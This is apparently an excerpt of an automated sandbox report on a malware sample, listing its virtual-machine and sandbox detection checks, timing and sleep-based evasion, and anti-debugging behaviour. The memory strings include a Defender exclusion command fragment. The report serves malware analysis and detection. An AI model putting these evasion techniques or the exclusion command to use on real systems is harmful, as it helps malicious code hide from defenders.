Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Yara detected AntiVM3
Source: Yara match File source: 00000000.00000002.681851207.0000000002B4C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MOe7vYpWXW.exe PID: 6820, type: MEMORY
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: MOe7vYpWXW.exe, 00000000.00000002.681851207.0000000002B4C000.00000004.00000001.sdmp Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: MOe7vYpWXW.exe, 00000000.00000002.681851207.0000000002B4C000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe RDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\systray.exe RDTSC instruction interceptor: First address: 00000000006E98E4 second address: 00000000006E98EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\systray.exe RDTSC instruction interceptor: First address: 00000000006E9B4E second address: 00000000006E9B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Contains capabilities to detect virtual machines
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b} Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_00409A80 rdtsc 6_2_00409A80
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Thread delayed: delay time: 922337203685477 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe TID: 6912 Thread sleep time: -1844674407370954s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe TID: 6824 Thread sleep time: -104840s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe TID: 6884 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 5996 Thread sleep count: 34 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 5996 Thread sleep time: -68000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe TID: 6852 Thread sleep time: -44000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\systray.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\systray.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Thread delayed: delay time: 104840 Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: explorer.exe, 00000007.00000000.709533471.000000000A60E000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000007.00000000.703991349.00000000058C0000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: MOe7vYpWXW.exe, 00000000.00000002.681851207.0000000002B4C000.00000004.00000001.sdmp Binary or memory string: vmware
Source: MOe7vYpWXW.exe, 00000000.00000002.681851207.0000000002B4C000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: MOe7vYpWXW.exe, 00000000.00000002.681851207.0000000002B4C000.00000004.00000001.sdmp Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: explorer.exe, 00000007.00000000.705519418.0000000006650000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000007.00000000.709533471.000000000A60E000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: MOe7vYpWXW.exe, 00000000.00000002.681851207.0000000002B4C000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
Source: MOe7vYpWXW.exe, 00000000.00000002.681851207.0000000002B4C000.00000004.00000001.sdmp Binary or memory string: VMWARE
Source: MOe7vYpWXW.exe, 00000000.00000002.681851207.0000000002B4C000.00000004.00000001.sdmp Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000007.00000002.928503213.0000000004710000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
Source: explorer.exe, 00000007.00000000.703991349.00000000058C0000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000007.00000000.709637997.000000000A716000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
Source: explorer.exe, 00000007.00000000.703991349.00000000058C0000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000007.00000000.700660816.0000000004710000.00000004.00000001.sdmp Binary or memory string: War&Prod_VMware_SATAi
Source: MOe7vYpWXW.exe, 00000000.00000002.681851207.0000000002B4C000.00000004.00000001.sdmp Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: MOe7vYpWXW.exe, 00000000.00000002.681851207.0000000002B4C000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II
Source: explorer.exe, 00000007.00000000.709637997.000000000A716000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
Source: MOe7vYpWXW.exe, 00000000.00000002.681851207.0000000002B4C000.00000004.00000001.sdmp Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: explorer.exe, 00000007.00000000.703991349.00000000058C0000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_00409A80 rdtsc 6_2_00409A80
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_0040ACC0 LdrLoadDll, 6_2_0040ACC0
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_0142B944 mov eax, dword ptr fs:[00000030h] 6_2_0142B944
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_0142B944 mov eax, dword ptr fs:[00000030h] 6_2_0142B944
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_0140C962 mov eax, dword ptr fs:[00000030h] 6_2_0140C962
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_0140B171 mov eax, dword ptr fs:[00000030h] 6_2_0140B171
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_0140B171 mov eax, dword ptr fs:[00000030h] 6_2_0140B171
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_01409100 mov eax, dword ptr fs:[00000030h] 6_2_01409100
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_01409100 mov eax, dword ptr fs:[00000030h] 6_2_01409100
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_01409100 mov eax, dword ptr fs:[00000030h] 6_2_01409100
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_01424120 mov eax, dword ptr fs:[00000030h] 6_2_01424120
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_01424120 mov eax, dword ptr fs:[00000030h] 6_2_01424120
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_01424120 mov eax, dword ptr fs:[00000030h] 6_2_01424120
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_01424120 mov eax, dword ptr fs:[00000030h] 6_2_01424120
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_01424120 mov ecx, dword ptr fs:[00000030h] 6_2_01424120
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_0143513A mov eax, dword ptr fs:[00000030h] 6_2_0143513A
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_0143513A mov eax, dword ptr fs:[00000030h] 6_2_0143513A
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_014941E8 mov eax, dword ptr fs:[00000030h] 6_2_014941E8
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_0140B1E1 mov eax, dword ptr fs:[00000030h] 6_2_0140B1E1
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_0140B1E1 mov eax, dword ptr fs:[00000030h] 6_2_0140B1E1
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_0140B1E1 mov eax, dword ptr fs:[00000030h] 6_2_0140B1E1
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_0142C182 mov eax, dword ptr fs:[00000030h] 6_2_0142C182
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_0143A185 mov eax, dword ptr fs:[00000030h] 6_2_0143A185
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_01432990 mov eax, dword ptr fs:[00000030h] 6_2_01432990
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_014361A0 mov eax, dword ptr fs:[00000030h] 6_2_014361A0
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_014361A0 mov eax, dword ptr fs:[00000030h] 6_2_014361A0
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_014869A6 mov eax, dword ptr fs:[00000030h] 6_2_014869A6
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_014851BE mov eax, dword ptr fs:[00000030h] 6_2_014851BE
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_014851BE mov eax, dword ptr fs:[00000030h] 6_2_014851BE
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_014851BE mov eax, dword ptr fs:[00000030h] 6_2_014851BE
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_014851BE mov eax, dword ptr fs:[00000030h] 6_2_014851BE
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_01420050 mov eax, dword ptr fs:[00000030h] 6_2_01420050
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_01420050 mov eax, dword ptr fs:[00000030h] 6_2_01420050
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_014D1074 mov eax, dword ptr fs:[00000030h] 6_2_014D1074
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_014C2073 mov eax, dword ptr fs:[00000030h] 6_2_014C2073
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_014D4015 mov eax, dword ptr fs:[00000030h] 6_2_014D4015
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_014D4015 mov eax, dword ptr fs:[00000030h] 6_2_014D4015
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_01487016 mov eax, dword ptr fs:[00000030h] 6_2_01487016
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_01487016 mov eax, dword ptr fs:[00000030h] 6_2_01487016
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_01487016 mov eax, dword ptr fs:[00000030h] 6_2_01487016
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_0141B02A mov eax, dword ptr fs:[00000030h] 6_2_0141B02A
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_0141B02A mov eax, dword ptr fs:[00000030h] 6_2_0141B02A
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_0141B02A mov eax, dword ptr fs:[00000030h] 6_2_0141B02A
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_0141B02A mov eax, dword ptr fs:[00000030h] 6_2_0141B02A
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_0143002D mov eax, dword ptr fs:[00000030h] 6_2_0143002D
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_0143002D mov eax, dword ptr fs:[00000030h] 6_2_0143002D
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_0143002D mov eax, dword ptr fs:[00000030h] 6_2_0143002D
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_0143002D mov eax, dword ptr fs:[00000030h] 6_2_0143002D
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_0143002D mov eax, dword ptr fs:[00000030h] 6_2_0143002D
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_0149B8D0 mov eax, dword ptr fs:[00000030h] 6_2_0149B8D0
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_0149B8D0 mov ecx, dword ptr fs:[00000030h] 6_2_0149B8D0
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_0149B8D0 mov eax, dword ptr fs:[00000030h] 6_2_0149B8D0
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_0149B8D0 mov eax, dword ptr fs:[00000030h] 6_2_0149B8D0
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_0149B8D0 mov eax, dword ptr fs:[00000030h] 6_2_0149B8D0
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_0149B8D0 mov eax, dword ptr fs:[00000030h] 6_2_0149B8D0
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_014058EC mov eax, dword ptr fs:[00000030h] 6_2_014058EC
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_01409080 mov eax, dword ptr fs:[00000030h] 6_2_01409080
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_01483884 mov eax, dword ptr fs:[00000030h] 6_2_01483884
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_01483884 mov eax, dword ptr fs:[00000030h] 6_2_01483884
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_014320A0 mov eax, dword ptr fs:[00000030h] 6_2_014320A0
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_014320A0 mov eax, dword ptr fs:[00000030h] 6_2_014320A0
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_014320A0 mov eax, dword ptr fs:[00000030h] 6_2_014320A0
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_014320A0 mov eax, dword ptr fs:[00000030h] 6_2_014320A0
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_014320A0 mov eax, dword ptr fs:[00000030h] 6_2_014320A0
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_014320A0 mov eax, dword ptr fs:[00000030h] 6_2_014320A0
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_014490AF mov eax, dword ptr fs:[00000030h] 6_2_014490AF
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_0143F0BF mov ecx, dword ptr fs:[00000030h] 6_2_0143F0BF
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_0143F0BF mov eax, dword ptr fs:[00000030h] 6_2_0143F0BF
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_0143F0BF mov eax, dword ptr fs:[00000030h] 6_2_0143F0BF
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_0140DB40 mov eax, dword ptr fs:[00000030h] 6_2_0140DB40
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_014D8B58 mov eax, dword ptr fs:[00000030h] 6_2_014D8B58
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_0140F358 mov eax, dword ptr fs:[00000030h] 6_2_0140F358
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_0140DB60 mov ecx, dword ptr fs:[00000030h] 6_2_0140DB60
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_01433B7A mov eax, dword ptr fs:[00000030h] 6_2_01433B7A
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_01433B7A mov eax, dword ptr fs:[00000030h] 6_2_01433B7A
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_014C131B mov eax, dword ptr fs:[00000030h] 6_2_014C131B
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_014853CA mov eax, dword ptr fs:[00000030h] 6_2_014853CA
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_014853CA mov eax, dword ptr fs:[00000030h] 6_2_014853CA
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_014303E2 mov eax, dword ptr fs:[00000030h] 6_2_014303E2
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_014303E2 mov eax, dword ptr fs:[00000030h] 6_2_014303E2
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_014303E2 mov eax, dword ptr fs:[00000030h] 6_2_014303E2
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_014303E2 mov eax, dword ptr fs:[00000030h] 6_2_014303E2
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_014303E2 mov eax, dword ptr fs:[00000030h] 6_2_014303E2
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_014303E2 mov eax, dword ptr fs:[00000030h] 6_2_014303E2
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_0142DBE9 mov eax, dword ptr fs:[00000030h] 6_2_0142DBE9
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_014C138A mov eax, dword ptr fs:[00000030h] 6_2_014C138A
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_014BD380 mov ecx, dword ptr fs:[00000030h] 6_2_014BD380
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_01411B8F mov eax, dword ptr fs:[00000030h] 6_2_01411B8F
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_01411B8F mov eax, dword ptr fs:[00000030h] 6_2_01411B8F
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_0143B390 mov eax, dword ptr fs:[00000030h] 6_2_0143B390
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_01432397 mov eax, dword ptr fs:[00000030h] 6_2_01432397
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_014D5BA5 mov eax, dword ptr fs:[00000030h] 6_2_014D5BA5
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_01434BAD mov eax, dword ptr fs:[00000030h] 6_2_01434BAD
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_01434BAD mov eax, dword ptr fs:[00000030h] 6_2_01434BAD
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_01434BAD mov eax, dword ptr fs:[00000030h] 6_2_01434BAD
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_01409240 mov eax, dword ptr fs:[00000030h] 6_2_01409240
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_01409240 mov eax, dword ptr fs:[00000030h] 6_2_01409240
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_01409240 mov eax, dword ptr fs:[00000030h] 6_2_01409240
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_01409240 mov eax, dword ptr fs:[00000030h] 6_2_01409240
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_014CEA55 mov eax, dword ptr fs:[00000030h] 6_2_014CEA55
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_01494257 mov eax, dword ptr fs:[00000030h] 6_2_01494257
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_014BB260 mov eax, dword ptr fs:[00000030h] 6_2_014BB260
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_014BB260 mov eax, dword ptr fs:[00000030h] 6_2_014BB260
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_014D8A62 mov eax, dword ptr fs:[00000030h] 6_2_014D8A62
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_0144927A mov eax, dword ptr fs:[00000030h] 6_2_0144927A
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_01418A0A mov eax, dword ptr fs:[00000030h] 6_2_01418A0A
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_01405210 mov eax, dword ptr fs:[00000030h] 6_2_01405210
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_01405210 mov ecx, dword ptr fs:[00000030h] 6_2_01405210
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_01405210 mov eax, dword ptr fs:[00000030h] 6_2_01405210
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_01405210 mov eax, dword ptr fs:[00000030h] 6_2_01405210
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_0140AA16 mov eax, dword ptr fs:[00000030h] 6_2_0140AA16
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_0140AA16 mov eax, dword ptr fs:[00000030h] 6_2_0140AA16
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_014CAA16 mov eax, dword ptr fs:[00000030h] 6_2_014CAA16
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_014CAA16 mov eax, dword ptr fs:[00000030h] 6_2_014CAA16
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_01423A1C mov eax, dword ptr fs:[00000030h] 6_2_01423A1C
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_01444A2C mov eax, dword ptr fs:[00000030h] 6_2_01444A2C
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_01444A2C mov eax, dword ptr fs:[00000030h] 6_2_01444A2C
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_01432ACB mov eax, dword ptr fs:[00000030h] 6_2_01432ACB
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_01432AE4 mov eax, dword ptr fs:[00000030h] 6_2_01432AE4
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_0143D294 mov eax, dword ptr fs:[00000030h] 6_2_0143D294
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_0143D294 mov eax, dword ptr fs:[00000030h] 6_2_0143D294
